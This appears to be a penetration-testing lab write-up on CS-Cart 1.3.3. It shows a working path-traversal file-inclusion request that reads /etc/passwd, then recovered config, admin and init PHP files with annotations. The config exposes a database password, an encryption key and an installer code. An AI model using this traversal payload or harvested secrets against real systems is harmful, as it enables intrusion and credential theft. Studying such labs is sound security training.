LFI
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -s http://$IP/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
dovecot:x:104:111:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
postfix:x:105:112::/var/spool/postfix:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
<br />
<b>Fatal error</b>: Class 'PHPMailer' not found in <b>/var/www/classes/phpmailer/class.cs_phpmailer.php</b> on line <b>6</b><br />
The target CS-Cart instance is version 1.3.3, which suffers from multiple vulnerabilities. One of them, LFI, has been confirmed.
patrick is a valid system user.
File Read via PHP Filter
Attempting to read one of the endpoints via the PHP filter method fails, because the inclusion is made relative to the /var/www/classes/phpmailer directory.
config.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ echo [...REDACTED...] | base64 -d
<?php
//
// $Id: config.php 1822 2006-05-17 16:44:43Z
//
// CS-Cart 1.3.3 main configuration, as recovered from the target via the LFI shown
// above. It sets the DB credentials, host/directory layout, table aliases, the
// target-script map, PHP error logging and a few secrets. It must be included by a
// script that has already defined IN_CSCART, DS and $cscart_dir (init.php does this);
// a direct request dies on the guard below.
if ( !defined('IN_CSCART') ) { die('Access denied'); }
// Database credentials are stored in plaintext; the recovered values are the MySQL
// root account with the password 'root'.
$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';
// Example:
// Your url is http://www.yourcompany.com/store/cscart
// cscart_http_host = 'www.yourcompany.com';
// cscart_http_dir = '/store/cscart';
//
// Your secure url is https://secure.yourcompany.com/secure_dir/cscart
// cscart_https_host = 'secure.yourcompany.com';
// cscart_https_dir = '/secure_dir/cscart';
// Host and directory where cs-cart is installed on usual server
$cscart_http_host = '192.168.116.39';
$cscart_http_dir = '';
// Host and directory where cs-cart is installed on secure server
$cscart_https_host = '192.168.116.39';
$cscart_https_dir = '';
// Front-controller script names; init.php also hands them to Smarty.
$admin_index = 'admin.php';
$customer_index = 'index.php';
$image_index = 'image.php';
// Names of the request parameters that select the target script, mode and action.
// init.php reads them as variable variables ($$target_name), so globals with these
// names must already exist at that point (presumably populated from the request by
// prepare.php, which is not visible here).
$target_name = 'target';
$mode_name = 'mode';
$action_name = 'action';
// DEMO mode
$demo_mode_enabled = false;
// Trial mode
$trial_mode = false;
// All PHP errors and notices are silenced for the whole request; logging is
// re-enabled further down only when LOG_PHP_EVENTS is defined.
error_reporting(0);
//
// Load local config data
//
// Optional per-installation overrides. The @ suppresses any error, so a missing or
// broken local_conf.php is ignored without trace.
@include_once($cscart_dir . DS . 'local_conf.php');
//
// Directory definitions
//
// Filesystem paths
$core_dir = $cscart_dir . DS . 'core' . DS;
// NOTE(review): the request at the top of this page reaches class.cs_phpmailer.php
// directly with classes_dir supplied as a GET parameter, so neither this assignment
// nor the IN_CSCART guard above is in effect for that include -- presumably
// register_globals fills the variable there; confirm against that file.
$classes_dir = $cscart_dir . DS . 'classes' . DS;
$addons_dir = $cscart_dir . DS . 'addons' . DS;
$skins_dir = $cscart_dir . DS . 'skins' . DS;
$common_dir = $cscart_dir . DS . 'include' . DS . 'common' . DS;
$admin_dir = $cscart_dir . DS . 'include' . DS . 'admin' . DS;
$targets_dir = $cscart_dir . DS . 'targets'.DS;
$customer_dir = $cscart_dir . DS . 'include' . DS . 'customer' . DS;
$payment_files_dir = $cscart_dir . DS . 'payments' . DS;
$shipping_files_dir = $cscart_dir . DS . 'shippings' . DS;
// Writable runtime directories (logs, compiled templates, DB dumps, downloads, upgrades).
$var_dir = array();
$var_dir['log'] = $cscart_dir . DS .'var' . DS . 'log' . DS;
$var_dir['compiled'] = $cscart_dir . DS .'var' . DS . 'compiled' . DS;
$var_dir['database'] = $cscart_dir . DS .'var' . DS . 'database' . DS;
$var_dir['downloads'] = $cscart_dir . DS .'var' . DS . 'downloads' . DS;
$var_dir['upgrade'] = $cscart_dir . DS .'var' . DS . 'upgrade' . DS;
// Defines HTTPS when the current connection is secure (the file itself is not visible
// here). $core_dir already ends in DS, so this path carries a doubled separator.
require $core_dir . DS . 'https_detect.php';
// Define host directory depending on the current connection
$cscart_host_dir = (defined('HTTPS')) ? $cscart_https_dir : $cscart_http_dir;
// Directory for store images on file system
$images_storage_dir = $cscart_dir . DS .'images' . DS;
$images_storage_web_dir = $cscart_host_dir.'/images/';
// Web paths
$skins_rel_dir = 'skins/'; // Used for web path
//
// Database tables aliases...
//
// Logical name => physical table name; queries in init.php interpolate these directly.
$db_tables = array(
'categories' => 'cscart_categories',
'category_descriptions' => 'cscart_category_descriptions',
'category_images' => 'cscart_category_images',
'category_images_links' => 'cscart_category_images_links',
'currencies' => 'cscart_currencies',
'currency_descriptions' => 'cscart_currency_descriptions',
'common_images' => 'cscart_common_images',
'common_images_links' => 'cscart_common_images_links',
'detailed_images' => 'cscart_detailed_images',
'products' => 'cscart_products',
'product_descriptions' => 'cscart_product_descriptions',
'products_categories' => 'cscart_products_categories',
'product_prices' => 'cscart_product_prices',
'products_taxes' => 'cscart_products_taxes',
'users' => 'cscart_users',
'user_profiles' => 'cscart_user_profiles',
'sessions' => 'cscart_sessions',
'product_images' => 'cscart_product_images',
'product_images_links' => 'cscart_product_images_links',
'languages' => 'cscart_languages',
'language_values' => 'cscart_language_values',
'memberships' => 'cscart_memberships',
'membership_descriptions' => 'cscart_membership_descriptions',
'states' => 'cscart_states',
'state_descriptions' => 'cscart_state_descriptions',
'orders' => 'cscart_orders',
'order_details' => 'cscart_order_details',
'taxes' => 'cscart_taxes',
'tax_descriptions' => 'cscart_tax_descriptions',
'tax_rates' => 'cscart_tax_rates',
'shippings' => 'cscart_shippings',
'shipping_descriptions' => 'cscart_shipping_descriptions',
'shipping_rates' => 'cscart_shipping_rates',
'discounts' => 'cscart_discounts',
'discount_descriptions' => 'cscart_discount_descriptions',
'discounts_categories' => 'cscart_discounts_categories',
'discounts_users' => 'cscart_discounts_users',
'discounts_products' => 'cscart_discounts_products',
'destination_descriptions' => 'cscart_destination_descriptions',
'destinations' => 'cscart_destinations',
'destination_elements' => 'cscart_destination_elements',
'countries' => 'cscart_countries',
'country_descriptions' => 'cscart_country_descriptions',
'payments' => 'cscart_payments',
'payment_descriptions' => 'cscart_payment_descriptions',
'payment_processors' => 'cscart_payment_processors',
'common_descriptions' => 'cscart_common_descriptions',
'settings' => 'cscart_settings',
'settings_sections' => 'cscart_settings_sections',
'settings_subsections' => 'cscart_settings_subsections',
'settings_routines' => 'cscart_settings_routines',
'settings_elements' => 'cscart_settings_elements',
'settings_descriptions' => 'cscart_settings_descriptions',
'settings_variants' => 'cscart_settings_variants',
'topics' => 'cscart_topics',
'topic_descriptions' => 'cscart_topic_descriptions',
'pages' => 'cscart_pages',
'page_descriptions' => 'cscart_page_descriptions',
'pages_topics' => 'cscart_pages_topics',
'ekeys' => 'cscart_ekeys',
'sitemap_links' => 'cscart_sitemap_links',
'sitemap_sections' => 'cscart_sitemap_sections',
'static_data' => 'cscart_static_data',
'static_data_descriptions' => 'cscart_static_data_descriptions',
'statistics_element_descriptions' => 'cscart_statistics_element_descriptions',
'statistics_elements' => 'cscart_statistics_elements',
'statistics_interval_descriptions' => 'cscart_statistics_interval_descriptions',
'statistics_intervals' => 'cscart_statistics_intervals',
'statistics_reports' => 'cscart_statistics_reports',
'statistics_report_descriptions' => 'cscart_statistics_report_descriptions',
'statistics_tables' => 'cscart_statistics_tables',
'statistics_table_descriptions' => 'cscart_statistics_table_descriptions',
'statistics_table_conditions' => 'cscart_statistics_table_conditions',
'statistics_table_elements' => 'cscart_statistics_table_elements',
'statistics_table_element_conditions' => 'cscart_statistics_table_element_conditions',
'product_options' => 'cscart_product_options',
'product_options_descriptions' => 'cscart_product_options_descriptions',
'product_options_exceptions' => 'cscart_product_options_exceptions',
'product_option_variants' => 'cscart_product_option_variants',
'product_option_variants_descriptions' => 'cscart_product_option_variants_descriptions',
'product_options_inventory' => 'cscart_product_options_inventory',
'product_global_option_links' => 'cscart_product_global_option_links',
'new_orders' => 'cscart_new_orders',
'product_features' => 'cscart_product_features',
'product_features_values' => 'cscart_product_features_values',
'product_features_variants_descriptions' => 'cscart_product_features_variants_descriptions',
'product_features_descriptions' => 'cscart_product_features_descriptions',
'forms' => 'cscart_forms',
'form_elements' => 'cscart_form_elements',
'form_element_variants' => 'cscart_form_element_variants',
'form_descriptions' => 'cscart_form_descriptions',
'shipping_services' => 'cscart_shipping_services',
'shipping_service_descriptions' => 'cscart_shipping_service_descriptions',
'membership_privileges' => 'cscart_membership_privileges',
'privileges' => 'cscart_privileges',
'privilege_descriptions' => 'cscart_privilege_descriptions',
);
//
// Default targets
//
// Request target name => script that admin.php/index.php include for it. Because the
// front controllers look the request value up as a key here, only these names can
// ever be dispatched.
$script_targets = array (
'categories' => $targets_dir.'categories.php',
'products' => $targets_dir.'products.php',
'cart' => $targets_dir.'cart.php',
'help' => $targets_dir.'help.php',
'index' => $targets_dir.'index.php',
'auth' => $targets_dir.'auth.php',
'profiles' => $targets_dir.'profiles.php',
'languages' => $targets_dir.'languages.php',
'settings' => $targets_dir.'settings.php',
'settings_dev' => $targets_dir.'settings_dev.php',
'states' => $targets_dir.'states.php',
'shippings' => $targets_dir.'shippings.php',
'discounts' => $targets_dir.'discounts.php',
'checkout' => $targets_dir.'checkout.php',
'orders' => $targets_dir.'orders.php',
'taxes' => $targets_dir.'taxes.php',
'memberships' => $targets_dir.'memberships.php',
'destinations' => $targets_dir.'destinations.php',
'countries' => $targets_dir.'countries.php',
'payments' => $targets_dir.'payments.php',
'tools' => $targets_dir.'tools.php',
'html_catalog' => $targets_dir.'html_catalog.php',
'topics' => $targets_dir.'topics.php',
'pages' => $targets_dir.'pages.php',
'sitemap' => $targets_dir.'sitemap.php',
'exceptions' => $targets_dir.'exceptions.php',
'search' => $targets_dir.'search.php',
'statistics' => $targets_dir.'statistics.php',
'static_data' => $targets_dir.'static_data.php',
'product_options' => $targets_dir.'product_options.php',
'file_browser' => $targets_dir.'file_browser.php',
'client_env' => $targets_dir.'client_env.php',
'payment_notification' => $targets_dir.'payment_notification.php',
'wishlist' => $targets_dir.'wishlist.php',
'template_editor' => $targets_dir.'template_editor.php',
'product_features' => $targets_dir.'product_features.php',
'index_page' => $targets_dir.'index_page.php',
'upgrade_center' => $targets_dir.'upgrade_center.php',
'skin_selector' => $targets_dir.'skin_selector.php',
'forms' => $targets_dir.'forms.php',
'my_account' => $targets_dir.'my_account.php',
'currencies' => $targets_dir.'currencies.php',
'order_management' => $targets_dir.'order_management.php',
'logs' => $targets_dir.'logs.php',
);
//
// Check if logging is enabled
//
// var/log/settings.php is executed as PHP from the same directory the event log below
// is written into, so that directory's permissions matter: it must be writable by the
// web server for logging, yet nothing untrusted may be able to place files there.
if (file_exists($var_dir['log'].'settings.php')) {
include $var_dir['log'].'settings.php';
}
// When LOG_PHP_EVENTS is defined (normally by the settings.php just included), PHP
// errors go to a dated file under var/log. The file is created with a leading
// "<?php die(); ?>" so it cannot be rendered if fetched over HTTP; failures of
// fopen/fwrite/fclose are suppressed with @ and never reported.
if (defined('LOG_PHP_EVENTS')) {
ini_set("log_errors", 1);
if (!file_exists($var_dir['log'].'php_events_'.date("Y-m-d").'.log.php')) {
$fd = @fopen($var_dir['log'].'php_events_'.date("Y-m-d").'.log.php', 'w');
@fwrite($fd, "<?php die(); ?>\n");
@fclose($fd);
}
ini_set("error_log", $var_dir['log'].'php_events_'.date("Y-m-d").'.log.php');
ini_set("ignore_repeated_errors", 1);
}
// Absolute base URLs; $current_location follows the HTTPS constant set by https_detect.php.
$http_location = "http://$cscart_http_host".$cscart_http_dir;
$https_location = "https://$cscart_https_host".$cscart_https_dir;
$current_location = (defined('HTTPS')) ? $https_location : $http_location;
// BlowFish key
// Used by the crypto helpers (not visible here). The recovered value looks like the
// shipped default rather than a per-installation secret, and it sits in plaintext
// next to the DB credentials.
$crypt_key = 'YOURSVERYSECRETKEY';
// Database layer
// Selects core/db_<type>.php in init.php.
$db_type = 'mysql';
// Set the session name
// C - for customer area
// A - for admin area
// The different session names for areas allows you to
// log in as customer and admin in one browser instance
$CSCART_SESSION_NAMES = array('C' => 'csid', 'A' => 'acsid');
// List of file extensions which the uploaded or renamed via admin area
// file can not has.
// This is a denylist (the enforcing code is not visible here): any extension not
// listed is accepted. An allowlist of permitted extensions is the safer design.
$forbidden_file_extensions = array (
'php',
'php3',
'pl',
'com',
'exe',
'bat',
'cgi'
);
// Uncomment this line if you experience problems with mysql5 server
//define('MYSQL5', true);
// Authentication code to access the installator
// Plaintext installer access code; anyone who can read this file (as the LFI above
// did) obtains it together with the DB credentials.
$AUTH_CODE = '1YTRKM2U';
// Version constant; init.php echoes it back for ?version requests.
define('CSCART_VERSION', '1.3.3');
?>
Successfully fetched and decoded the config.php file; root:root are the credentials for the DB, YOURSVERYSECRETKEY is the hashing key, and 1YTRKM2U is the code for the installer.
admin.php
<?php
//
// $Id: admin.php 1462 2006-03-17 12:39:35Z zeke $
//
// Admin-area front controller. Bootstraps the cart (prepare.php, init.php), requires
// an admin-area login for every target except the trusted ones, then includes the
// target script chosen from $script_targets and renders index.tpl.
DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
// prepare.php is not visible here; init.php (below on this page) expects IN_CSCART,
// DS and $cscart_dir to exist, so presumably prepare.php defines them.
require './prepare.php';
require './init.php';
$index_script = $admin_index;
// Force HTTPS for the admin area when the store setting asks for it.
// Assumes fn_https_redirect() terminates the request (its code is not visible here).
if ($settings['General']['secure_admin'] == 'Y' ) {
fn_https_redirect($https_location.'/'.$current_url);
}
// A session authenticated for a different area (e.g. the customer area) is not valid
// here: discard it and send the visitor back to the admin index.
if (!empty($auth['user_id']) && $auth['area'] != AREA) {
$auth = array();
fn_redirect($index_script);
}
// Default target: the login page for anonymous visitors, statistics for logged-in users.
if (empty($target) && empty($auth['user_id'])) {
$target = 'index';
} elseif (empty($target) && !empty($auth['user_id'])) {
$target = 'statistics';
}
//
// Common includes
//
include $common_dir.'admin_common.php';
fn_add_breadcrumb(fn_get_lang_var('home'), $index_script);
//
// Targets that may be reached without logging in
//
$trusted_targets = array (
'index' => true,
'auth' => true,
);
// Access check: an anonymous visitor asking for anything but a trusted target is sent
// to the login form, with the requested URL remembered in the session.
// NOTE(review): this relies on fn_redirect() ending the request; if it returned, the
// include further down would still run for the unauthenticated visitor -- confirm.
if (empty($auth['user_id']) && !isset($trusted_targets[$target])) {
sess_register('redirect_url');
$redirect_url = $current_url;
fn_set_notification('E', fn_get_lang_var('access_denied'), fn_get_lang_var('error_not_logged'));
fn_redirect("$index_script?$target_name=auth&$mode_name=login_form");
}
//
// Include target script from $script_targets array
//
// $target comes from the request (see init.php). A value that is not a key of
// $script_targets gives an undefined index (silenced by error_reporting(0) in
// config.php), file_exists() is false, and the 'no_page' exception is raised instead
// of including anything.
if (file_exists($script_targets[$target])) {
include $script_targets[$target];
} else {
fn_set_exception('no_page');
}
$smarty->assign('index_script', $index_script);
fn_show_template('index.tpl',$smarty, true);
?>
N/A
init.php
<?php
//
// $Id: init.php 1806 2006-05-17 11:59:31Z
//
// Shared bootstrap for both areas: loads config.php and the core function files,
// connects to the database, builds $settings, starts the session, initialises the
// templater/language/currency and pushes the request and URL context into Smarty.
// Statement order matters: everything before sessions.php runs with no session or
// user context at all.
if ( !defined('IN_CSCART') ) { die('Access denied'); }
// Require configuration
require_once($cscart_dir .DS. 'config.php');
// Version disclosure: answered for any ?version request before sessions or
// authentication exist, so it is visible to anyone who can reach the script.
if (isset($_GET['version'])) {
die('CS-CART: version <b>'.CSCART_VERSION.'</b>');
}
// Require core functions
require_once($core_dir.'fn_compat.php');
require_once($core_dir."db_{$db_type}.php");
require_once($core_dir.'fn_database.php');
require_once($core_dir.'fn_users.php');
require_once($core_dir.'fn_catalog.php');
require_once($core_dir.'fn_cms.php');
require_once($core_dir.'fn_cart.php');
require_once($core_dir.'fn_locations.php');
require_once($core_dir.'fn_common.php');
require_once($core_dir.'fn_classes_initializers.php');
require_once($core_dir.'fn_statistics.php');
// Clean up templates cache
// NOTE(review): this removes the compiled-template directory (fn_rm is not visible
// here) for any ?cleanup_cache request, and it runs before sessions.php/user.php, so
// no login is required to trigger it; consider gating it behind an admin check.
if (isset($_GET['cleanup_cache'])) {
echo "Cache cleanup... ";
$res = fn_rm($var_dir['compiled'], false);
die($res == true? "<b style='color: green;'>OK</b>" : "<b style='color: red;'>FAILED</b>");
}
// Require HTTPS functions
require_once($core_dir.'https.php');
// Require tests functions
require_once($core_dir.'tests.php');
// Check if software is installed
// '%DB_HOST%' is the unreplaced installer placeholder.
if ($db_host == '%DB_HOST%') {
die('The cart is <b>not installed</b>. Please click here to start installation process: <a href="install.php">[install]</a>');
}
// Connect to database
$db_conn = db_initiate($db_host, $db_user, $db_password, $db_name);
if (!$db_conn) {
fn_error(debug_backtrace(), "Cannot connect to the database server", false);
}
if (defined('MYSQL5')) {
db_query("set @@sql_mode=''");
}
// Build cart settings array
// Loads all global settings into $settings, nested by section/subsection when present.
// Options of type 'M' or 'N' are stored query-string encoded and expanded with
// parse_str(); all other values are kept as-is. The query interpolates only the
// constant table alias from config.php.
if ($_result = db_query("SELECT option_name, value, section_id, subsection_id, option_type FROM $db_tables[settings] WHERE is_global='Y'")) {
while($_row = db_fetch_array($_result)) {
if (!empty($_row['subsection_id'])) {
if ($_row['option_type'] == 'M' || $_row['option_type'] == 'N') {
parse_str($_row['value'], $settings[$_row['section_id']][$_row['subsection_id']][$_row['option_name']]);
} else {
$settings[$_row['section_id']][$_row['subsection_id']][$_row['option_name']] = $_row['value'];
}
} elseif (!empty($_row['section_id'])) {
if ($_row['option_type'] == 'M' || $_row['option_type'] == 'N') {
parse_str($_row['value'], $settings[$_row['section_id']][$_row['option_name']]);
} else {
$settings[$_row['section_id']][$_row['option_name']] = $_row['value'];
}
} else {
$settings[$_row['option_name']] = $_row['value'];
}
}
db_free_result($_result);
unset($_row);
}
// Set the session name
// AREA ('A' or 'C') is defined by the front controller before this file is required.
$CSCART_SESSION_NAME = $CSCART_SESSION_NAMES[AREA];
//Start session mechanism
require($core_dir.'sessions.php');
// select the skin to display
include $core_dir . 'skins.php';
// initialize templater
fn_init_templater();
// initialize store language
include $core_dir . 'languages.php';
if (!defined('NO_SESSION')) {
// Get descriptions for company country and state
if (!empty($settings['Company']['company_country'])) {
$settings['Company']['company_country_descr'] = fn_get_country_name($settings['Company']['company_country'], $cart_language);
}
if (!empty($settings['Company']['company_state'])) {
$settings['Company']['company_state_descr'] = fn_get_state_name($settings['Company']['company_state'], $settings['Company']['company_country'], $cart_language);
}
}
// Include addons
include $core_dir.'addons.php';
// Include notification reporting subsystem
include $core_dir.'notification.php';
// Include user information
include $core_dir.'user.php';
// Request context. Since $target_name is 'target' (config.php), $$target_name is
// $target itself, and likewise for mode/action: these lines only normalise absent
// values to '' or 0. The globals themselves must already have been populated from
// the request by earlier code (prepare.php or user.php -- not visible here).
$target = isset($$target_name) ? $$target_name : '';
$mode = isset($$mode_name) ? $$mode_name : '';
$action = isset($$action_name) ? $$action_name : '';
$category_id = isset($category_id) ? $category_id : 0;
$topic_id = isset($topic_id) ? $topic_id : 0;
$product_id = isset($product_id) ? $product_id : 0;
$page_id = isset($page_id) ? $page_id : 0;
$page = isset($page) ? $page : 1;
// Assigned by reference so breadcrumbs added later (fn_add_breadcrumb) reach the template.
$breadcrumbs = array();
$smarty->assign_by_ref('breadcrumbs', $breadcrumbs);
$temp_file_dir=$smarty->compile_dir;
// Plug for javascript detector. Don't edit!
$client_env['is_javascript'] = 'Y';
$smarty->assign('client_env', @$client_env);
// GET CLIENT IP
// Taken straight from the connection; no proxy headers are consulted here.
if (!defined('CONSOLE')) {
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$smarty->assign('REMOTE_ADDR', $REMOTE_ADDR);
}
$QUERY_STRING = empty($QUERY_STRING) ? '' : $QUERY_STRING;
if (defined('SKINS_PANEL')) {
$smarty->assign('admin_skin', $admin_skin);
$smarty->assign('customer_skin', $customer_skin);
$smarty->assign('demo_mode_enabled', $demo_mode_enabled);
$smarty->assign('available_skins', $available_skins);
}
$smarty->assign_by_ref('settings', $settings);
// initialize store currency
include $core_dir . 'currencies.php';
$smarty->assign('CSCARTSESSNAME', $CSCART_SESSION_NAME);
// The session id is read through a global named after the session cookie
// ('csid' / 'acsid'); where that global is populated is not visible here.
$smarty->assign('CSCARTSESSID', @$GLOBALS[$CSCART_SESSION_NAME]);
// URL's assignments
$smarty->assign('http_location', $http_location);
$smarty->assign('https_location', $https_location);
$smarty->assign('cscart_dir', $cscart_dir);
$smarty->assign('current_location', $current_location);
// Raw request query string handed to the templates; they must escape it per context
// wherever it is echoed.
$smarty->assign('QUERY_STRING', $QUERY_STRING);
$smarty->assign('cscart_host_dir', $cscart_host_dir);
$current_url = ((AREA == 'A') ? $admin_index : $customer_index) . ((!empty($QUERY_STRING)) ? '?'.$QUERY_STRING : '');
// NOTE(review): as shown this str_replace is a no-op ('&' -> '&'); the original
// presumably escaped '&' to its HTML entity and the page rendering decoded it --
// confirm against the real file.
$smarty->assign('current_url', str_replace('&', '&', $current_url));
$smarty->assign('admin_index', $admin_index);
$smarty->assign('customer_index', $customer_index);
$smarty->assign('image_index', $image_index);
$smarty->assign('no_image_path', $no_image_path);
// Targets and their names assignments
$smarty->assign('target_name', $target_name);
$smarty->assign('mode_name', $mode_name);
$smarty->assign('action_name', $action_name);
$smarty->assign('target', @$target);
$smarty->assign_by_ref('mode', @$mode);
$smarty->assign_by_ref('action', @$action);
$smarty->assign('cart_language', @$cart_language);
$smarty->assign('skin_dir', $skin_dir);
$smarty->assign('skins_dir', $web_skins_dir);
$smarty->assign('demo_username', @$demo_username);
$smarty->assign('demo_password', @$demo_password);
if (AREA == 'A') {
$smarty->assign('users_online', $users_online);
}
// Smarty mail assignments
$smarty_mail->assign('settings', @$settings);
$smarty_mail->assign('http_location', $http_location);
$smarty_mail->assign('https_location', $https_location);
$smarty_mail->assign('current_location', $current_location);
$smarty_mail->assign('admin_index', $admin_index);
$smarty_mail->assign('customer_index', $customer_index);
$smarty_mail->assign('target_name', $target_name);
$smarty_mail->assign('mode_name', $mode_name);
$smarty_mail->assign('action_name', $action_name);
// Single-letter order status codes and their labels, as used by the templates.
$order_status_descr = array ( // FIXME!!! Move this somewhere...
'O' => 'open',
'C' => 'completed',
'P' => 'processed',
'D' => 'declined',
'F' => 'failed',
'I' => 'cancelled',
'B' => 'backordered'
);
$smarty->assign('order_status_descr', $order_status_descr);
?>
N/A